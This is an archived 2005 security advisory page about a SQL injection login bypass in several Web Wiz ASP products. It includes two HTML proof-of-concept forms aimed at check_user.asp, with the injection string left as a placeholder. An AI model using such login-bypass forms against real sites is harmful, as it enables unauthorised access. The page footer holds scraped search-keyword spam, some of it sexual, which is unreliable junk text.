about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Web Wiz Multiple Products SQL Injection Vulnerability


Title Web Wiz Multiple Products SQL Injection Vulnerability
Published 2005-12-30-12:00AM
Updated 2005-12-30-04:27PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by DevilBox of KAPDA.
Vulnerable  Web Wiz Site News Access 97 3.0 6
Web Wiz Site News Access 2000 3.0 6
Web Wiz Polls Access 97 3.0 6
Web Wiz Polls Access 2000 3.0 6
Web Wiz Journal Access 97 1.0
Web Wiz Journal Access 2000 1.0
Web Wiz Database Login Access 97 1.71
Web Wiz Database Login Access 2000 1.71
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 09 Dec 2009 03:18:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
allinurl: breast sex SEXY HOD-ms040 ASVARYA Lauren nude pics www.bjsswx Arbicsex telnet HP www.800wwj imap rfc Free+downl www.sex.co Lanka sex womenphoto sexewww.se SSH-2.0-Op http://www sexiv Www.Bluefi yn86.com breast sex Hot and se Hi this is Lalatx sex hot xx Khadijakoc 15-yoshli telnet cra search/exp Www.indian www sex 20 CMS is Fre Www.naruto Lady sex p kerio winr Dodhwali 1.0 final news for c TGFXGF galleria tenagesex phpbb 14 ARB SEX PHP Live H www.0771-5 www.j131.c wwwworldse www.freese